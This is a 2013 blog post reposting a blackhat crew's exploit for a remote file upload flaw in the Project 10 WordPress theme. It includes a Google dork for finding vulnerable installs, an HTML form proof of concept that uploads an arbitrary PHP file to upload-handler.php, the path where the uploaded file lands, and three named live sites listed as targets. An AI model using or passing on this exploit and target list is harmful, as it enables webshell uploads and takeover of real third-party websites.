Thursday, November 21, 2013

WordPress Project 10 Themes - Remote File Upload Vulnerability

By on 3:33 AM
###################################################################################################
#_________            .___        _______                ___.   .__       
#\_   ___ \  ____   __| _/____    \      \   ______  _  _\_ |__ |__| ____ 
#/    \  \/ /  _ \ / __ |/ __ \   /   |   \_/ __ \ \/ \/ /| __ \|  |/ __ \
#\     \___(  <_> ) /_/ \  ___/  /    |    \  ___/\     / | \_\ \  \  ___/
# \______  /\____/\____ |\___  > \____|__  /\___  >\/\_/  |___  /__|\___  >
#        \/            \/    \/          \/     \/            \/        \/
###################################################################################################
# Exploit Title: WordPress Project 10 Themes - Remote File Upload Vulnerability
# Author: Byakuya
# Date: 11/18/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://themeforest.net/item/project-10-magazine-theme/2513938
# Price: $40
# Affected Version: v1.0
# Infected File: upload-handler.php
# Category: webapps/php
# Google dork: inurl:/wp-content/themes/project10-theme/
# Tested on : Windows/Linux
###################################################################################################
  
# Exploit & POC :
  
<form enctype="multipart/form-data"
action="http://127.0.0.1/wordpress/wp-content/themes/project10-theme/functions/upload-handler.php" method="post">
Please choose a file: <input name="orange_themes" type="file" /><br />
<input type="submit" value="upload" />
</form>
  
# File path:
http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/up.php
  
# Live Site:
-http://givethekids.gr/give_v2/wp-content/themes/project10-theme//functions/upload-handler.php
-http://www.ba7ar.org/wp-content/themes/project10-theme//functions/upload-handler.php
-http://www.ineedamilliondollars.com/wp-content/themes/project10-theme/functions/upload-handler.php
 
# Credit: ./Byakuya ./Mr Ohsem ./Cai ./RatKid ./Agam ./Lord-Router ./X-Tuned ./MrN3wb1e ./Official Code-Newbie
# Facebook: https://www.facebook.com/CodeNewbieCrew
# Website: http://www.codenewbie.net
# Malaysia & Indonesia BlackHat
###################################################################################################

About Syed Faizan Ali

Faizan is a 17 year old young guy who is blessed with the art of Blogging,He love to Blog day in and day out,He is a Website Designer and a Certified Graphics Designer.